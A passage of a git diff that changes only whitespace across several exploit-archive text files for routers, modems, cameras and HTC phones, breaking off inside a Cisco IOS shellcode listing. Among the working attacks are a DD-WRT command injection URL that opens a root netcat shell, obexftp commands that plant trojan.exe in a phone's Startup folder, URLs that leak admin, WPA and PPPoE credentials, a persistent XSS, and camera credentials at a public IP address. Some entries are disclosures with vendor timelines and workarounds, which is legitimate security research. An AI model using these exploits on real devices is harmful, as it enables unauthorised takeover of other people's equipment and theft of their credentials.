to enumerate what files and directories exist +within the www root directory and beyond by using 200, 403 and 404 +errors as a guide. + +Affected Versions: Firmware V3.4.0_ap (others unknown) + +III. VENDOR RESPONSE + +12 June, 2009 - Contacted vendor. +15 June, 2009 - Vendor responded. 
Stated the DG632 is an end of life +product and is no longer supported in a production and development +sense, as such, there will be no further firmware releases to resolve +this issue. + +IV. CREDIT + +Discovered by Tom Neaves + +# milw0rm.com [2009-06-15] diff --git a/platforms/hardware/remote/9066.txt b/platforms/hardware/remote/9066.txt index f7c07e995..71128bf29 100755 --- a/platforms/hardware/remote/9066.txt +++ b/platforms/hardware/remote/9066.txt 
@@ -1,36 +1,36 @@
--------------------------------------------------
-SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
--------------------------------------------------
-Author : Septemb0x
-Web Site : www.ozkanbozkurt.com
-Procuts Site : http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080A46FD&id=87789673
-Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini
-D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level Reset to: Low Or Download"
--------------------------------------------------
-Exploit: http://[sitename-ipadress]/dvr.ini
--------------------------------------------------
-Example: http://88.249.248.177/dvr.ini
-Show;
-[PASSWORD]
-administrator=
-password_a=
-user=
-password=
-enable=0
-user0=ozcan = Camera Username
-password0=3893 = Camera Password
-right0=223
-encode=1
-num=2
-user1=yurt
-password1=yurt
-right1=223
-.
-.
-.
-... Login The Camera :)
--------------------------------------------------
-Greetz : BHDR, BARCOD3
--------------------------------------------------
-
-# milw0rm.com [2009-07-01]
+-------------------------------------------------
+SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
+-------------------------------------------------
+Author : Septemb0x
+Web Site : www.ozkanbozkurt.com
+Procuts Site : http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080A46FD&id=87789673
+Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini
+D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level Reset to: Low Or Download"
+-------------------------------------------------
+Exploit: http://[sitename-ipadress]/dvr.ini
+-------------------------------------------------
+Example: http://88.249.248.177/dvr.ini
+Show;
+[PASSWORD]
+administrator=
+password_a=
+user=
+password=
+enable=0
+user0=ozcan = Camera Username
+password0=3893 = Camera Password
+right0=223
+encode=1
+num=2
+user1=yurt
+password1=yurt
+right1=223
+.
+.
+.
+... Login The Camera :)
+-------------------------------------------------
+Greetz : BHDR, BARCOD3
+-------------------------------------------------
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/hardware/remote/9117.txt b/platforms/hardware/remote/9117.txt
index 071431ad4..6ab004b23 100755
--- a/platforms/hardware/remote/9117.txt
+++ b/platforms/hardware/remote/9117.txt
@@ -1,116 +1,116 @@ -I shall complete the information related to Bugtraq ID: 33359 - -Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal -Author: Alberto Moreno Tablado -Vendor: HTC -Vulnerable Products: -- HTC devices running Windows Mobile 6 -- HTC devices running Windows Mobile 6.1 -Non vulnerable products: -- HTC devices running Windows Mobile 5.0 -- Other vendors’ Windows Mobile devices -References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html - -Summary: -HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder. - -Description: -There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability only affects to this vendor specifically. - -A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. - -The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and BD_ADDR address spoofing, can be used in order to avoid this. 
Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user. - -The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder. - -A remote attacker who previously owned authentication and authorization rights over Bluetooth can perform three risky actions on the device: - -1) Browse directories located out of the limits of the default shared folder - -An attacker can discover the structure of the file system and access to any directory within it, including: -- The flash hard drive -- The external storage card -- The internal mass storage memory, included in specific HTC devices - -2) Download files without permission - -An attacker can download sensitive files located anywhere in the file system, such as: -- personal pictures and documents located in \My Documents or any other directory -- Contacts, Calendar & Tasks information located in \PIM.vol -- Temporary internet cache and cookies located in \Windows\Profiles\guest\ -- emails located in \Windows\Messaging - -gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging" -Browsing 00:17:83:02:BA:3C ... -Channel: 4 -Connecting...done -Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... 
done - - - - - - - - -done -Disconnecting...done -gospel@gospel-shift:~/bluez$ - -3) Upload malicious files - -An attacker can replace third party or system executable files with malicious files as well as upload trojans to any place in the filesystem, such as \Windows\Startup and, therefore, shall be executed the next time Windows Mobile inits. - -gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe -Browsing 00:17:83:02:BA:3C ... -Channel: 4 -Connecting...done -Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done -Sending "trojan.exe"...\done -Disconnecting...done -gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup" -Browsing 00:17:83:02:BA:3C ... -Channel: 4 -Connecting...done -Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... done - - - - - - - -done -Disconnecting...done -gospel@gospel-shift:~/bluez$ - -About affected and non affected products: -The following HTC devices are affected by this vulnerability: -- HTC devices running Windows Mobile 6 Professional -- HTC devices running Windows Mobile 6 Standard -- HTC devices running Windows Mobile 6.1 Professional -- HTC devices running Windows Mobile 6.1 Standard - -You can find a list of tested HTC devices proved to be vulnerable at http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html#AffectedProducts - -HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version. - -Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ... - -Vendor Status: -The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. 
Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable. - -Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected. - -HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw. - -Workaround: -This vulnerability is a zero-day threat. This means that all devices shipped up to date (July 2009) may be vulnerable. - -Wait for proper vendor response and updates. - -Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list. - -Alberto - -# milw0rm.com [2009-07-10] +I shall complete the information related to Bugtraq ID: 33359 + +Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal +Author: Alberto Moreno Tablado +Vendor: HTC +Vulnerable Products: +- HTC devices running Windows Mobile 6 +- HTC devices running Windows Mobile 6.1 +Non vulnerable products: +- HTC devices running Windows Mobile 5.0 +- Other vendors’ Windows Mobile devices +References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html + +Summary: +HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder. + +Description: +There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. 
The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability only affects to this vendor specifically. + +A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. + +The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and BD_ADDR address spoofing, can be used in order to avoid this. Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user. + +The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder. 
+ +A remote attacker who previously owned authentication and authorization rights over Bluetooth can perform three risky actions on the device: + +1) Browse directories located out of the limits of the default shared folder + +An attacker can discover the structure of the file system and access to any directory within it, including: +- The flash hard drive +- The external storage card +- The internal mass storage memory, included in specific HTC devices + +2) Download files without permission + +An attacker can download sensitive files located anywhere in the file system, such as: +- personal pictures and documents located in \My Documents or any other directory +- Contacts, Calendar & Tasks information located in \PIM.vol +- Temporary internet cache and cookies located in \Windows\Profiles\guest\ +- emails located in \Windows\Messaging + +gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging" +Browsing 00:17:83:02:BA:3C ... +Channel: 4 +Connecting...done +Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... done + + + + + + + + +done +Disconnecting...done +gospel@gospel-shift:~/bluez$ + +3) Upload malicious files + +An attacker can replace third party or system executable files with malicious files as well as upload trojans to any place in the filesystem, such as \Windows\Startup and, therefore, shall be executed the next time Windows Mobile inits. + +gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe +Browsing 00:17:83:02:BA:3C ... +Channel: 4 +Connecting...done +Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done +Sending "trojan.exe"...\done +Disconnecting...done +gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup" +Browsing 00:17:83:02:BA:3C ... +Channel: 4 +Connecting...done +Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... 
done + + + + + + + +done +Disconnecting...done +gospel@gospel-shift:~/bluez$ + +About affected and non affected products: +The following HTC devices are affected by this vulnerability: +- HTC devices running Windows Mobile 6 Professional +- HTC devices running Windows Mobile 6 Standard +- HTC devices running Windows Mobile 6.1 Professional +- HTC devices running Windows Mobile 6.1 Standard + +You can find a list of tested HTC devices proved to be vulnerable at http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html#AffectedProducts + +HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version. + +Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ... + +Vendor Status: +The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable. + +Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected. + +HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw. + +Workaround: +This vulnerability is a zero-day threat. This means that all devices shipped up to date (July 2009) may be vulnerable. + +Wait for proper vendor response and updates. + +Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list. + +Alberto + +# milw0rm.com [2009-07-10] 
diff --git a/platforms/hardware/remote/9209.txt b/platforms/hardware/remote/9209.txt
index 70e8275a9..e385bb23a 100755
--- a/platforms/hardware/remote/9209.txt
+++ b/platforms/hardware/remote/9209.txt
@@ -1,103 +1,103 @@
-This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
-at the latest 24 sp1 version of the firmware.
-
- The problem is due to many bugs and bad software design decisions. Here is
-part of httpd.c:
-
-859 if (containsstring(file, "cgi-bin")) {
-860
-861 auth_fail = 0;
-862 if (!do_auth
-863 (conn_fp, auth_userid, auth_passwd, auth_realm,
-864 authorization, auth_check))
-865 auth_fail = 1;
-
-
-......... (snip)............
-
-899
-900 }
-901 exec = fopen("/tmp/exec.tmp", "wb");
-902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
-903 if (query)
-904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");
-
-........... (snip)..........
-
-926 if (auth_fail == 1) {
-927 send_authenticate(auth_realm);
-928 auth_fail = 0;
-
-------------
-
-3) issue 3: httpd runs as root :)
-
-
-
-Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
-connect to the management web interface can get easily root on the device via
-his browser with an URL like:
-
- http://routerIP/cgi-bin/;command_to_execute
-
-There is a catch though: whitespaces break it. Anyway, they can be easily
-replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
-becomes as easy as typing this in your browser's url bar:
-
-http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
-
-
-Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
-problem:
-http://www.youtube.com/watch?v=UhDcXCVFrvM
-
-
-Fortunately, httpd by default does not listen on the outbound interface.
-However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
-device's owner does not even need to have an authenticated session on the web
-UI which is bad, bad). However, a base authentication dialog will appear. In
-IE even this can be supressed, see this one:
-
-http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/
-
-Unlike the already documented CSRF vulnerability (
-http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
-session. This means someone can even post some crafted [img] link on a forum
-and a dd-wrt router owner visiting the forum will get owned :)
-
-
-A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
-would say :)
-
-
-Thanks krassyo at krassyo.info for his support :)
-
-
-Leka vecher :)
-
-# milw0rm.com [2009-07-20]
+This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
+at the latest 24 sp1 version of the firmware.
+
+ The problem is due to many bugs and bad software design decisions. Here is
+part of httpd.c:
+
+859 if (containsstring(file, "cgi-bin")) {
+860
+861 auth_fail = 0;
+862 if (!do_auth
+863 (conn_fp, auth_userid, auth_passwd, auth_realm,
+864 authorization, auth_check))
+865 auth_fail = 1;
+
+
+......... (snip)............
+
+899
+900 }
+901 exec = fopen("/tmp/exec.tmp", "wb");
+902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
+903 if (query)
+904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");
+
+........... (snip)..........
+
+926 if (auth_fail == 1) {
+927 send_authenticate(auth_realm);
+928 auth_fail = 0;
+
+------------
+
+3) issue 3: httpd runs as root :)
+
+
+
+Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
+connect to the management web interface can get easily root on the device via
+his browser with an URL like:
+
+ http://routerIP/cgi-bin/;command_to_execute
+
+There is a catch though: whitespaces break it. Anyway, they can be easily
+replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
+becomes as easy as typing this in your browser's url bar:
+
+http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
+
+
+Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
+problem:
+http://www.youtube.com/watch?v=UhDcXCVFrvM
+
+
+Fortunately, httpd by default does not listen on the outbound interface.
+However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
+device's owner does not even need to have an authenticated session on the web
+UI which is bad, bad). However, a base authentication dialog will appear. In
+IE even this can be supressed, see this one:
+
+http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/
+
+Unlike the already documented CSRF vulnerability (
+http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
+session. This means someone can even post some crafted [img] link on a forum
+and a dd-wrt router owner visiting the forum will get owned :)
+
+
+A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
+would say :)
+
+
+Thanks krassyo at krassyo.info for his support :)
+
+
+Leka vecher :)
+
+# milw0rm.com [2009-07-20]
diff --git a/platforms/hardware/remote/9432.txt b/platforms/hardware/remote/9432.txt
index a6ea4df4b..298029624 100755
--- a/platforms/hardware/remote/9432.txt
+++ b/platforms/hardware/remote/9432.txt
@@ -1,22 +1,22 @@ -====================================> -System Information - - -Product Name: ST585 -Serial Number: CP0734JTMTR -Software Release: 6.2.29.2 -Software Variant: AA -Boot Loader Version: 1.0.8 -Product Code: 36029470 -Board Name: BANT-W - - ---#[ exploit ]#--- - - [#] - http://192.168.1.254./cgi/b/backup/user.ini - - - ######################## - # Viva Kingdom Of Saudi Arabia # - ####################### - -# milw0rm.com [2009-08-13] +====================================> +System Information + + +Product Name: ST585 +Serial Number: CP0734JTMTR +Software Release: 6.2.29.2 +Software Variant: AA +Boot Loader Version: 1.0.8 +Product Code: 36029470 +Board Name: BANT-W + + ---#[ exploit ]#--- + + [#] - http://192.168.1.254./cgi/b/backup/user.ini + + + ######################## + # Viva Kingdom Of Saudi Arabia # + ####################### + +# milw0rm.com [2009-08-13] diff --git a/platforms/hardware/remote/9456.txt b/platforms/hardware/remote/9456.txt index e103a36ab..a282cc8c7 100755 --- a/platforms/hardware/remote/9456.txt +++ b/platforms/hardware/remote/9456.txt 
@@ -1,31 +1,31 @@ ------------------------------------------------------ - -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- - --> Made in "Maghnia City" (DZ) <-- - --> Contact : sunhouse2@yahoo.com <-- - --> Greetz to : His0k4 all my friends <-- - --> Good Ramadan to all muslims <-- ------------------------------------------------------ - -Exploit tested on modem with this informations : - -ZTE CORPORATION - -Date : NOV 2008 -Product : ADSL Modem -Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG -Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV - ------------------------------------------------------ -Introduction: - -This modem is used by many providers in the world like -russia india and algeria [used by provider and all clients of "Easy ADSL"]. - -Exploit : -We can change easily the user and password admin and get full access to the modem. - -Go only here and set new user and password: - -http://192.168.1.1/adminpasswd.cgi - -# milw0rm.com [2009-08-18] +----------------------------------------------------- + -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- + --> Made in "Maghnia City" (DZ) <-- + --> Contact : sunhouse2@yahoo.com <-- + --> Greetz to : His0k4 all my friends <-- + --> Good Ramadan to all muslims <-- +----------------------------------------------------- + +Exploit tested on modem with this informations : + +ZTE CORPORATION + +Date : NOV 2008 +Product : ADSL Modem +Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG +Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV + +----------------------------------------------------- +Introduction: + +This modem is used by many providers in the world like +russia india and algeria [used by provider and all clients of "Easy ADSL"]. + +Exploit : +We can change easily the user and password admin and get full access to the modem. + +Go only here and set new user and password: + +http://192.168.1.1/adminpasswd.cgi + +# milw0rm.com [2009-08-18] 
diff --git a/platforms/hardware/remote/9473.txt b/platforms/hardware/remote/9473.txt
index 2634fdf41..f6290fb13 100755
--- a/platforms/hardware/remote/9473.txt
+++ b/platforms/hardware/remote/9473.txt
@@ -1,39 +1,39 @@ ------------------------------------------------------ - -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- - --> Made in "Maghnia City" (DZ) <-- - --> Contact : sunhouse2@yahoo.com <-- - --> Greetz to : His0k4 all my friends <-- - --> Good Ramadan to all muslims <-- ------------------------------------------------------ - -Exploit tested on modem with this informations : - -ZTE CORPORATION - -Date : NOV 2008 -Product : ADSL Modem -Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG -Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV - ------------------------------------------------------ -Introduction: - -This modem is used by many providers in the world like -russia india and algeria [used by provider and all clients of "Easy ADSL"]. - -Exploit : -We can get access to to configuration of the modem , and get PPPOE user & password. - -Go only here -http://192.168.1.1/vpivci.cgi - -A video uploaded to explain how we can use this exploit to get PPPOE sessions -with user & password - -download video demonstration > - -http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar - ------------------------------------------------------- - -# milw0rm.com [2009-08-18] +----------------------------------------------------- + -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- + --> Made in "Maghnia City" (DZ) <-- + --> Contact : sunhouse2@yahoo.com <-- + --> Greetz to : His0k4 all my friends <-- + --> Good Ramadan to all muslims <-- +----------------------------------------------------- + +Exploit tested on modem with this informations : + +ZTE CORPORATION + +Date : NOV 2008 +Product : ADSL Modem +Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG +Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV + +----------------------------------------------------- +Introduction: + +This modem is used by many providers in the world like +russia india and algeria [used by provider and all clients of "Easy ADSL"]. 
+ +Exploit : +We can get access to to configuration of the modem , and get PPPOE user & password. + +Go only here +http://192.168.1.1/vpivci.cgi + +A video uploaded to explain how we can use this exploit to get PPPOE sessions +with user & password + +download video demonstration > + +http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar + +------------------------------------------------------ + +# milw0rm.com [2009-08-18] diff --git a/platforms/hardware/remote/9498.txt b/platforms/hardware/remote/9498.txt index a845d8ec8..52fe13f11 100755 --- a/platforms/hardware/remote/9498.txt +++ b/platforms/hardware/remote/9498.txt 
@@ -1,26 +1,26 @@ -Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless -routa' runnin' firmware 1.2.0.8. - -1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply -request widout audenticashun: - -http://netgear/router-info.htm -http://netgear/cgi-bin/router-info.htm - -De routa' gots'ta respond wid: - -DeviceID:WNR2000; -HardwareVersion:; -FirmwareVersion:V1.2.0.8NA; -WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf - -2. Unaudenticated disclosho' man uh administrato' passwo'd Simply -request widout audenticashun: - -http://netgear/cgi-bin/NETGEAR_WNR2000.cfg - -Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem. -WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme -be left as an 'esercise t'de eyeballer. Ah be baaad... - -# milw0rm.com [2009-08-24] +Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless +routa' runnin' firmware 1.2.0.8. + +1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply +request widout audenticashun: + +http://netgear/router-info.htm +http://netgear/cgi-bin/router-info.htm + +De routa' gots'ta respond wid: + +DeviceID:WNR2000; +HardwareVersion:; +FirmwareVersion:V1.2.0.8NA; +WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf + +2. Unaudenticated disclosho' man uh administrato' passwo'd Simply +request widout audenticashun: + +http://netgear/cgi-bin/NETGEAR_WNR2000.cfg + +Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem. +WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme +be left as an 'esercise t'de eyeballer. Ah be baaad... + +# milw0rm.com [2009-08-24] diff --git a/platforms/hardware/remote/9658.txt b/platforms/hardware/remote/9658.txt index cb7b32807..1a87d470e 100755 --- a/platforms/hardware/remote/9658.txt +++ b/platforms/hardware/remote/9658.txt 
@@ -1,28 +1,28 @@ -_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ -_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ -_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ -_____0______0______0__0______0___0__0________0___0__00000__0___0_ -_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ -_________________________________________________________________ - - - -# [+] Neufbox NB4-R1.5.10-MAIN Persistent XSS -# [+] Author : 599eme Man -# [+] Contact : Flouf@live.fr -# [+] Thanks : Moudi, Kim, Neocoderz, Syltrox66, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell... -# -#[------------------------------------------------------------------------------------] -# -# [+] Vulnerability -# -# [+] Persistent XSS -# -# - http://[IPLocal]/3_1 => SSID = 1> -# Valid and go here to execute the XSS : http://[IPLocal]/3_0 -# -#[------------------------------------------------------------------------------------] -# -######################################################################################################### - -# milw0rm.com [2009-09-14] +_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ +_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ +_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ +_____0______0______0__0______0___0__0________0___0__00000__0___0_ +_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ +_________________________________________________________________ + + + +# [+] Neufbox NB4-R1.5.10-MAIN Persistent XSS +# [+] Author : 599eme Man +# [+] Contact : Flouf@live.fr +# [+] Thanks : Moudi, Kim, Neocoderz, Syltrox66, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell... 
+# +#[------------------------------------------------------------------------------------] +# +# [+] Vulnerability +# +# [+] Persistent XSS +# +# - http://[IPLocal]/3_1 => SSID = 1> +# Valid and go here to execute the XSS : http://[IPLocal]/3_0 +# +#[------------------------------------------------------------------------------------] +# +######################################################################################################### + +# milw0rm.com [2009-09-14] diff --git a/platforms/hardware/shellcode/13290.txt b/platforms/hardware/shellcode/13290.txt index 193290db1..3511afa98 100755 --- a/platforms/hardware/shellcode/13290.txt +++ b/platforms/hardware/shellcode/13290.txt 
@@ -1,83 +1,83 @@ -# Version-independent IOS shellcode, Andy Davis 2008 -# -# No hard-coded IOS addresses required -# -# The technique uses 4-byte signatures near references to the -# required addresses within the IOS "text" memory region. -# The addresses are then recovered from memory and used within the -# shellcode. -# -# This is beta 1 - this code can be highly optimised I'm sure, -# for example, the search routine could be reused and the number -# of registers cleared could be reduced - but it works :-) -# -# As this is the first iteration of this shellcode, I'm not making any -# claims as to exactly how portable it is - it has been tested on a -# number of IOS images and therefore, the concept has been demonstrated. -# -# Various simple techniques have been used to ensure that there are -# no nulls in the shellcode - - -.equ sig_vty, 0x7F60B910 # signature for vty_info -.equ sig_kill, 0x639C8889 # signature for terminate() -.equ start, 0x80018001 # start of the search - - -3c 80 80 02 lis r4,-32766 -38 84 80 01 addi r4,r4,-32767 # the start address for the search -3c a0 63 9d lis r5,25501 -38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature -38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls -(technique used throughout the shellcode) -38 e7 fe 70 addi r7,r7,-400 -7c c4 38 6e l1: lwzux r6,r4,r7 -7c 06 28 40 cmplw r6,r5 # is address contents equal to signature -40 82 ff f8 bne 18 # no, keep searching -7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill" -38 84 01 e8 addi r4,r4,488 -38 84 fe 70 addi r4,r4,-400 -7c c4 28 2e lwzx r6,r4,r5 -38 a5 01 98 addi r5,r5,408 -38 a5 fe 70 addi r5,r5,-400 -7c c6 28 30 slw r6,r6,r5 -7c c6 2c 30 srw r6,r6,r5 -38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of -terminate() from here -7c 84 32 14 add r4,r4,r6 # add offset to current address -7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10 -7c e7 3a 78 xor r7,r7,r7 -3c a0 7f 61 lis r5,32609 -38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" 
